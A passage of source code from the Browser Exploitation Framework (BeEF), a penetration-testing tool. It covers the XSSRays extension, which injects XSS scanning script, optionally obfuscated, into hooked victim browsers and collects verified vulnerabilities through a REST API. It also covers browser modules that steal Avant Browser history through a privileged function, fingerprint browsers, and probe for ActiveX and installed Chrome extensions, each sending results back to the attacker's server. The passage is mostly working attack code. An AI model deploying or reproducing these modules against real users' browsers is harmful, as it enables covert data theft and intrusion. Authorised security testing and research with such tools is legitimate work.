DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/webrtc handler'.to_json
def initialize(message = nil)
super(message || DEFAULT_MESSAGE)
end
end
# Raised when an invalid named parameter is passed to an /api/webrtc handler.
class InvalidParamError < StandardError
DEFAULT_MESSAGE = 'Invalid parameter passed to /api/webrtc handler'.to_json
def initialize(message = nil)
str = 'Invalid "%s" parameter passed to /api/webrtc handler'
message = format str, message unless message.nil?
super(message)
end
end
end
end
end
end |
Ruby | beef/extensions/xssrays/api.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
module RegisterHttpHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::Xssrays::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
#
# Mounts the handlers and REST interface for processing XSS rays
#
# @param beef_server [BeEF::Core::Server] HTTP server instance
#
def self.mount_handler(beef_server)
# We register the http handler for the requester.
# This http handler will retrieve the http responses for all requests
beef_server.mount('/xssrays', BeEF::Extension::Xssrays::Handler.new)
# REST API endpoint
beef_server.mount('/api/xssrays', BeEF::Extension::Xssrays::XssraysRest.new)
end
end
module RegisterPreHookCallback
BeEF::API::Registrar.instance.register(BeEF::Extension::Xssrays::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send')
# checks at every polling if there are new scans to be started
def self.pre_hook_send(hooked_browser, body, _params, _request, _response)
return if hooked_browser.nil?
xssrays = BeEF::Extension::Xssrays::API::Scan.new
xssrays.start_scan(hooked_browser, body)
end
end
end
end
end |
YAML | beef/extensions/xssrays/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
xssrays:
enable: false
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 3000
cross_domain: true |
Ruby | beef/extensions/xssrays/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
end
end
end
require 'extensions/xssrays/models/xssraysscan'
require 'extensions/xssrays/models/xssraysdetail'
require 'extensions/xssrays/api/scan'
require 'extensions/xssrays/handler'
require 'extensions/xssrays/api'
require 'extensions/xssrays/rest/xssrays' |
Ruby | beef/extensions/xssrays/handler.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
class Handler < BeEF::Core::Router::Router
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
get '/' do
# verify if the request contains the hook token
# raise an error if it's null or not found in the DB
beef_hook = params[:hbsess] || nil
if beef_hook.nil? || HB.where(session: beef_hook).first.nil?
print_error '[XSSRAYS] Invalid beef hook ID: the hooked browser cannot be found in the database'
return
end
# verify the specified ray ID is valid
rays_scan_id = params[:raysid] || nil
if rays_scan_id.nil? || !BeEF::Filters.nums_only?(rays_scan_id)
print_error '[XSSRAYS] Invalid ray ID'
return
end
case params[:action]
when 'ray'
# we received a ray
parse_rays(rays_scan_id)
when 'finish'
# we received a notification for finishing the scan
finalize_scan(rays_scan_id)
else
# invalid action
print_error '[XSSRAYS] Invalid action'
return
end
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST,GET'
end
# parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
def parse_rays(rays_scan_id)
xssrays_scan = XS.find(rays_scan_id)
hooked_browser = HB.where(session: params[:hbsess]).first
if xssrays_scan.nil?
print_error '[XSSRAYS] Invalid scan'
return
end
xssrays_detail = XD.new(
hooked_browser_id: hooked_browser.session,
vector_name: params[:n],
vector_method: params[:m],
vector_poc: params[:p],
xssraysscan_id: xssrays_scan.id
)
xssrays_detail.save
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked domain [#{hooked_browser.domain}]")
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
end
# finalize the XssRays scan marking the scan as finished in the db
def finalize_scan(rays_scan_id)
xssrays_scan = BeEF::Core::Models::Xssraysscan.find(rays_scan_id)
if xssrays_scan.nil?
print_error '[XSSRAYS] Invalid scan'
return
end
xssrays_scan.update(is_finished: true, scan_finish: Time.now)
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] finished at [#{xssrays_scan.scan_finish}]")
end
end
end
end
end |
Ruby | beef/extensions/xssrays/api/scan.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
module API
class Scan
include BeEF::Core::Handlers::Modules::BeEFJS
#
# Add the xssrays main JS file to the victim DOM if there is a not-yet-started scan entry in the db.
#
def start_scan(hb, body)
@body = body
config = BeEF::Core::Configuration.instance
hb = BeEF::Core::Models::HookedBrowser.find(hb.id)
# TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested
# TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want
xs = BeEF::Core::Models::Xssraysscan.where(hooked_browser_id: hb.id, is_started: false).first
# stop here if there are no XssRays scans to be started
return if xs.nil? || xs.is_started == true
# set the scan as started
xs.update(is_started: true)
# build the beefjs xssrays component
# the URI of the XssRays handler where rays should come back if the vulnerability is verified
beefurl = BeEF::Core::Server.instance.url
cross_domain = xs.cross_domain
timeout = xs.clean_timeout
ws = BeEF::Core::Websocket::Websocket.instance
# TODO: antisnatchor: prevent sending "content" multiple times.
# Better leaving it after the first run, and don't send it again.
# todo antisnatchor: remove this gsub crap adding some hook packing.
# If we use WebSockets, just reply wih the component contents
if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session)
content = File.read(find_beefjs_component_path('beef.net.xssrays')).gsub('//
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', '')
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
if config.get('beef.extension.evasion.enable')
evasion = BeEF::Extension::Evasion::Evasion.instance
ws.send(evasion.obfuscate(content) + @body, hb.session)
else
ws.send(content + @body, hb.session)
end
# If we use XHR-polling, add the component to the main hook file
else
build_missing_beefjs_components 'beef.net.xssrays'
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
end
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}].")
end
def add_to_body(id, session, beefurl, cross_domain, timeout)
config = BeEF::Core::Configuration.instance
req = %{
beef.execute(function() {
beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout});
});
}
if config.get('beef.extension.evasion.enable')
evasion = BeEF::Extension::Evasion::Evasion.instance
@body << evasion.obfuscate(req)
else
@body << req
end
end
end
end
end
end
end |
Ruby | beef/extensions/xssrays/models/xssraysdetail.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Store the rays details, basically verified XSS vulnerabilities
#
class Xssraysdetail < BeEF::Core::Model
belongs_to :hooked_browser
belongs_to :xssraysscan
end
end
end
end |
Ruby | beef/extensions/xssrays/models/xssraysscan.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Store the XssRays scans started and finished, with relative ID
#
class Xssraysscan < BeEF::Core::Model
has_many :xssrays_details
end
end
end
end |
Ruby | beef/extensions/xssrays/rest/xssrays.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
# This class handles the routing of RESTful API requests for XSSRays
class XssraysRest < BeEF::Core::Router::Router
# Filters out bad requests before performing any routing
before do
config = BeEF::Core::Configuration.instance
# Require a valid API token from a valid IP address
halt 401 unless params[:token] == config.get('beef.api_token')
halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
CLEAN_TIMEOUT = config.get('beef.extension.xssrays.clean_timeout') || 3_000
CROSS_DOMAIN = config.get('beef.extension.xssrays.cross_domain') || true
HB = BeEF::Core::Models::HookedBrowser
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Returns the entire list of rays for all zombies
get '/rays' do
rays = XD.all.distinct.order(:id)
count = rays.length
result = {}
result[:count] = count
result[:rays] = []
rays.each do |ray|
result[:rays] << ray2hash(ray)
end
result.to_json
rescue StandardError => e
print_error "Internal error while retrieving rays (#{e.message})"
halt 500
end
# Returns all rays given a specific hooked browser id
get '/rays/:id' do
id = params[:id]
rays = XD.where(hooked_browser_id: id).distinct.order(:id)
count = rays.length
result = {}
result[:count] = count
result[:rays] = []
rays.each do |ray|
result[:rays] << ray2hash(ray)
end
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving rays list for hooked browser with id #{id} (#{e.message})"
halt 500
end
# Returns the entire list of scans for all zombies
get '/scans' do
scans = XS.distinct.order(:id)
count = scans.length
result = {}
result[:count] = count
result[:scans] = []
scans.each do |scan|
result[:scans] << scan2hash(scan)
end
result.to_json
rescue StandardError => e
print_error "Internal error while retrieving scans (#{e.message})"
halt 500
end
# Returns all scans given a specific hooked browser id
get '/scans/:id' do
id = params[:id]
scans = XS.where(hooked_browser_id: id).distinct.order(:id)
count = scans.length
result = {}
result[:count] = count
result[:scans] = []
scans.each do |_scans|
result[:scans] << scan2hash(scan)
end
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving scans list for hooked browser with id #{id} (#{e.message})"
halt 500
end
# Starts a new scan on the specified zombie ID
post '/scan/:id' do
id = params[:id]
hooked_browser = HB.where(session: id).distinct.order(:id).first
if hooked_browser.nil?
print_error '[XSSRAYS] Invalid hooked browser ID'
return
end
# set Cross-domain settings
cross_domain = params[:cross_domain].to_s
cross_domain = if cross_domain == ''
CROSS_DOMAIN
else
cross_domain != 'false'
end
# set clean timeout settings
clean_timeout = params[:clean_timeout].to_s
clean_timeout = CLEAN_TIMEOUT if clean_timeout == '' || !Filters.alphanums_only?(clean_timeout)
xssrays_scan = XS.new(
hooked_browser_id: hooked_browser.id,
scan_start: Time.now,
domain: hooked_browser.domain,
# check also cross-domain URIs found by the crawler
cross_domain: cross_domain,
# how long to wait before removing the iFrames from the DOM (5000ms default)
clean_timeout: clean_timeout
)
xssrays_scan.save
print_info(
"[XSSRays] Starting XSSRays [ip:#{hooked_browser.ip}], " \
"hooked domain [#{hooked_browser.domain}], " \
"cross-domain: #{cross_domain}, " \
"clean timeout: #{clean_timeout}"
)
result = scan2hash(xssrays_scan)
print_debug "[XSSRays] New scan: #{result}"
# result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while creating XSSRays scan on zombie with id #{id} (#{e.message})"
halt 500
end
private
# Convert a ray object to JSON
def ray2hash(ray)
{
id: ray.id,
hooked_browser_id: ray.hooked_browser_id,
vector_name: ray.vector_name,
vector_method: ray.vector_method,
vector_poc: ray.vector_poc
}
end
# Convert a scan object to JSON
def scan2hash(scan)
{
id: scan.id,
hooked_browser_id: scan.hooked_browser_id,
scan_start: scan.scan_start,
scan_finish: scan.scan_finish,
domain: scan.domain,
cross_domain: scan.cross_domain,
clean_timeout: scan.clean_timeout,
is_started: scan.is_started,
is_finished: scan.is_finished
}
end
# Raised when invalid JSON input is passed to an /api/xssrays handler.
class InvalidJsonError < StandardError
DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/xssrays handler'.freeze
def initialize(message = nil)
super(message || DEFAULT_MESSAGE)
end
end
# Raised when an invalid named parameter is passed to an /api/xssrays handler.
class InvalidParamError < StandardError
DEFAULT_MESSAGE = 'Invalid parameter passed to /api/xssrays handler'.freeze
def initialize(message = nil)
str = 'Invalid "%s" parameter passed to /api/xssrays handler'
message = format str, message unless message.nil?
super(message)
end
end
end
end
end
end |
JavaScript | beef/modules/browser/avant_steal_history/command.js | //
// Copyright (c) 2006-2023Wade Alcorn [email protected]
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if (!beef.browser.isA()) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
return;
}
var avant_iframe = document.createElement("iframe");
//var avant_iframe = beef.dom.createInvisibleIframe();
avant_iframe.setAttribute('src', 'browser:home');
avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
avant_iframe.setAttribute('width', '0');
avant_iframe.setAttribute('heigth', '0');
avant_iframe.setAttribute('scrolling','no');
avant_iframe.setAttribute('style', 'display:none');
document.body.appendChild(avant_iframe);
var vstr = {value: ""};
if (window['avant_history_<%= @command_id %>'].navigator) {
//This works if FF is the rendering engine
window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
} else {
// this works if Chrome is the rendering engine
//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
}
}); |
YAML | beef/modules/browser/avant_steal_history/config.yaml | #
# Copyright (c) 2006-2023Wade Alcorn [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
avant_steal_history:
enable: true
category: "Browser"
name: "Get Visited URLs (Avant Browser)"
description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
authors: ["Roberto Suggi Liverani"]
target:
working: ["FF"] |
Ruby | beef/modules/browser/avant_steal_history/module.rb | #
# Copyright (c) 2006-2023Wade Alcorn [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Avant_steal_history < BeEF::Core::Command
def self.options
[
{ 'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end |
JavaScript | beef/modules/browser/browser_fingerprinting/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var browser_type = new Array;
var browser_version = new Array;
var dom = document.createElement('b');
function unique(array) {
return $.grep(array, function(el, index) {
return index === $.inArray(el, array);
});
}
parse_browser_details = function() {
if (!browser_type.length) browser_type[0] = "unknown";
if (!browser_version.length) browser_version[0] = "unknown";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser_type="+unique(browser_type)+"&browser_version="+unique(browser_version));
};
// Browser fingerprints // in the form of: "URI","Browser","version(s)"
var fingerprints = new Array(
new Array("Safari","1+","feed://__rsrc__/__rsrc__/NextPage.tif"),
new Array("Firefox","1+","moz-icon://.autoreg?size=16"),
new Array("Firefox","2","resource:///res/html/gopher-audio.gif"),
new Array("Firefox","2-3","jar:resource:///chrome/classic.jar!/skin/classic/browser/Secure.png"),
new Array("Firefox","4-5","resource:///chrome/browser/skin/classic/browser/Secure.png"),
new Array("Firefox","1-6","resource:///chrome/browser/content/branding/icon128.png"),
new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
new Array("Internet Explorer","7+", "res://ieframe.dll/info_48.png"),
new Array("Internet Explorer","10+","res://ieframe.dll/immersivelogo.png"),
new Array("Tor Browser","1+","chrome://browser/content/abouttbupdate/aboutTBUpdateLogo.png")
);
for (var i=0; i<fingerprints.length; i++) {
var img = new Image;
img.id = fingerprints[i][0];
img.name = fingerprints[i][1];
img.src = fingerprints[i][2];
img.onload = function() { browser_type.push(this.id); browser_version.push(this.name); dom.removeChild(this); }
dom.appendChild(img);
}
setTimeout('parse_browser_details();', 2000);
}); |
YAML | beef/modules/browser/browser_fingerprinting/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
browser_fingerprinting:
enable: true
category: "Browser"
name: "Fingerprint Browser (PoC)"
description: "This module attempts to fingerprint the browser type and version using URI protocol handlers unique to Safari, Internet Explorer and Mozilla Firefox."
authors: ["bcoles"]
target:
working: ["IE", "FF", "S"]
not_working: ["ALL"] |
Ruby | beef/modules/browser/browser_fingerprinting/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Uses methods described here:
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Browser_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['browser_type'] = @datastore['browser_type'] unless @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] unless @datastore['browser_version'].nil?
content['fail'] = 'Failed to fingerprint browser.' if content.empty?
save content
end
end |
JavaScript | beef/modules/browser/detect_activex/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasActiveX())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
}); |
YAML | beef/modules/browser/detect_activex/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_activex:
enable: true
category: "Browser"
name: "Detect ActiveX"
description: "This module will check if the browser has ActiveX support."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["All"] |
Ruby | beef/modules/browser/detect_activex/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_activex < BeEF::Core::Command
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
activex = @datastore['results'].scan(/^activex=(Yes|No)/).flatten.first
return unless activex
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', activex)
end
end |
JavaScript | beef/modules/browser/detect_evernote_clipper/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = "";
var s = document.createElement('script');
s.onload = function() {
result = "Detected through presense of extension content script.";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result);
}
s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js';
document.body.appendChild(s);
var evdiv = document.getElementById('evernoteGlobalTools');
if (typeof(evdiv) != 'undefined' && evdiv != null) {
// Evernote Web Clipper must have been active as well, because we can detect one of the iFrames
iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult);
}
setTimeout(function() {
if (result == "") {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected");
}
document.body.removeChild(s);
}, 2000);
}); |
YAML | beef/modules/browser/detect_evernote_clipper/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_evernote_clipper:
enable: true
category: "Browser"
name: "Detect Evernote Web Clipper"
description: "This module checks if the Evernote Web Clipper extension is installed and active."
authors: ["xntrik"]
target:
not_working: ["IE"]
working: ["C"] |
Ruby | beef/modules/browser/detect_evernote_clipper/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_evernote_clipper < BeEF::Core::Command
def post_execute
content = {}
content['evernote_clipper'] = @datastore['evernote_clipper'] unless @datastore['evernote_clipper'].nil?
save content
end
end |
JavaScript | beef/modules/browser/detect_extensions/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
chrome_extensions = new Array(
new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
new Array("aknpkdffaafgjchaibgeefbgmgeghloj","Angry Birds"),
new Array("gighmmpiobklfepjocnamgkkbiglidom","AdBlock"),
new Array("cfhdojbkjhnklbpkdaibdccddilifddb","Adblock Plus (Beta)"),
new Array("ejjicmeblgpmajnghnpcppodonldlgfn","Google Calendar"),
new Array("mihcahmgecmbnbcchbopgniflfhgnkff","Google Mail Checker"),
new Array("lneaknkopdijkpnocmklfnjbeapigfbh","Google Maps"),
new Array("elioihkkcdgakfbahdoddophfngopipi","FB Photo Zoom"),
new Array("mmcegpfdgcoclcdfkjahiimlikdpnina","Plants vs Zombies"),
new Array("apdfllckaahabafndbhieahigkjlhalf","Google Docs"),
new Array("bfbmjmiodbnnpllbbbfblcplfjjepjdn","Turn Off the Lights"),
new Array("ejidjjhkpiempkbhmpbfngldlkglhimk","Offline Google Mail"),
new Array("pioclpoplcdbaefihamjohnefbikjilc","Evernote Web Clipper"),
new Array("aapbdbdomjkkjkaonfhkkikfgjllcleb","Google Translate"),
new Array("oadboiipflhobonjjffjbfekfjcgkhco","Google Chrome to Phone Extension"),
new Array("inmnggcpelemfookhlhkdfbechcdadfp","Picnik"),
new Array("hehijbfgiekmjfkfjpbkbammjbdenadd","IE Tab"),
new Array("hbdpomandigafcibbmofojjchbcdagbl","TweetDeck"),
new Array("mmimngoggfoobjdlefbcabngfnmieonb","Google Books"),
new Array("mgijmajocgfcbeboacabfgobmjgjcoja","Google Dictionary (by Google)"),
new Array("alelhddbbhepgpmgidjdcjakblofbmce","Awesome Screenshot: Capture \\u0026 Annotate"),
new Array("lbfehkoinhhcknnbdgnnmjhiladcgbol","Evernote Web"),
new Array("ciagpekplgpbepdgggflgmahnjgiaced","Add to Amazon Wish List"),
new Array("mmffncokckfccddfenhkhnllmlobdahm","FastestWeb - Browse Faster"),
new Array("onlgmecjpnejhfeofkgbfgnmdlipdejb","Picasa"),
new Array("fjnbnpbmkenffdnngjfgmeleoegfcffe","Stylish"),
new Array("keembkgclppcbilkekfgpobhldjjhpmn","Cargo Bridge"),
new Array("adpkifcfcacgmnggcbpbjbkdijciiigm","Bejeweled"),
new Array("pgjchkcfmigkkhedgjedmffdepgmpfil","Psykopaint"),
new Array("poknhlcknimnnbfcombaooklofipaibk","Canvas Rider"),
new Array("mijlebbfndhelmdpmllgcfadlkankhok","Quick Note"),
new Array("cgbogdmdefihhljhfeiklfiedefalcde","AddThis - Share \\u0026 Bookmark (new)"),
new Array("ckibcdccnfeookdmbahgiakhnjcddpki","Webpage Screenshot"),
new Array("loamdenijebhollnjgehcfbnpeelfhlk","The Fancy Pants Adventure: World 2"),
new Array("cknghehebaconkajgiobncfleofebcog","Monster Dash"),
new Array("lfkgmnnajiljnolcgolmmgnecgldgeld","Smooth Gestures"),
new Array("kcnhkahnjcbndmmehfkdnkjomaanaooo","Google Voice (by Google)"),
new Array("iajlkcpgcnbhfhpdeooockfaincfkjjj","Isoball 3"),
new Array("dgpdioedihjhncjafcpgbbjdpbbkikmi","Speed Dial"),
new Array("knkapnclbofjjgicpkfoagdjohlfjhpd","Little Alchemy"),
new Array("bmagokdooijbeehmkpknfglimnifench","Firebug Lite for Google Chrome\u2122"),
new Array("cgdllcbmneiklcmbeclfegccdjholomb","Bouncy Mouse"),
new Array("ajpgkpeckebdhofmmjfgcjjiiejpodla","Xmarks Bookmark Sync"),
new Array("hndllphbhpadfpoikpaofkkkpkpnmjik","Troll Emoticons"),
new Array("lfbgimoladefibpklnfmkpknadbklade","Webcam Toy"),
new Array("agoenciogemlojlhccbcpcfflicgnaak","BIODIGITAL HUMAN"),
new Array("pjjhlfkghdhmijklfnahfkpgmhcmfgcm","Google Reader"),
new Array("ehcibdjmpjlekgjhepbfmenfppliikcj","Pixlr-o-matic"),
new Array("bhmmomiinigofkjcapegjjndpbikblnp","WOT"),
new Array("icpgjfneehieebagbmdbhnlpiopdcmna","New Tab Redirect!"),
new Array("ihdkejbciahopmbagpnjmmkkdpfpaaak","Weather Window by WeatherBug"),
new Array("dlifoiidlkcpdlchhngenehnhcadakpl","Toss it"),
new Array("hpakbhbnhkbghdcejiiangcefallmaln","Bubble Shooter"),
new Array("dcilimldmomiaihcfkmaldanopfejefg","WGT Golf Challenge"),
new Array("kcahibnffhnnjcedflmchmokndkjnhpg","StumbleUpon"),
new Array("ejnkaeblpdcamcioiiabclakabcbjmbl","Box - 5 GB Free Storage"),
new Array("edfkoljdeffeedleidebkmmamepgbnbl","The Godfather: Five Families"),
new Array("hcchbhjknakkndfpdbapmdkhbbgojkno","Air Hockey"),
new Array("jgoepmocgafhnchmokaimcmlojpnlkhp","Google +1 Button"),
new Array("fkkaebihfmbofclegkcfkkemepfehibg","Full Screen Weather"),
new Array("kdmmkfaghgcicheaimnpffeeekheafkb","Autodesk Homestyler"),
new Array("nmameahlembdcigphohgiodcgjomcgeo","Facebook Notifications"),
new Array("bfegaehidkkcfaikpaijcdahnpikhobf","Gismeteo"),
new Array("bkgoccjhfjgjedhkiefaclppgbmoobnk","Audiotool"),
new Array("gheikhdfflhlbemfmhcfpeblehemeklp","Planetarium"),
new Array("hjhfaknohpjconjoefidanhihokmkice","Marvel Comics"),
new Array("fkmopoamfjnmppabeaphohombnjcjgla","Springpad"),
new Array("bfbameneiokkgbdmiekhjnmfkcnldhhm","Web Developer"),
new Array("gemohgpikgjbgmdfbfjdailocichgbjm","3D Bowling "),
new Array("hdokiejnpimakedhajhdlcegeplioahd","LastPass"),
new Array("lkpikhjbfbffdblahfidklcohlaeabak","Fieldrunners"),
new Array("ghgabhipcejejjmhhchfonmamedcbeod","Click\\u0026Clean"),
new Array("jdheeblenjmceeppomdgokgilmkonced","Lord of Ultima"),
new Array("beobeededemalmllhkmnkinmfembdimh","TV"),
new Array("faminaibgiklngmfpfbhmokfmnglamcm","PanicButton"),
new Array("mpedbpkelbhcbkdaglillalioeeekbpb","WGT Golf Game"),
new Array("bhoaojooagiaaiidlnfhkkafjpbbnnno","SKiD Racer"),
new Array("icppfcnhkcmnfdhfhphakoifcfokfdhg","Google Music"),
new Array("amigcgbheognjmfkaieeeadojiibgbdp","TooManyTabs for Chrome"),
new Array("khpikpdaalmlcipfphefaajfiofglcma","Gravity Duck"),
new Array("oohphhdkahjlioohbalmicpokoefkgid","Bastion"),
new Array("nonjdcjchghhkdoolnlbekcfllmednbl","Hover Zoom"),
new Array("khgabmflimjjbclkmljlpmgaleanedem","SparkChess"),
new Array("dajedkncpodkggklbegccjpmnglmnflm","Search by Image (by Google)"),
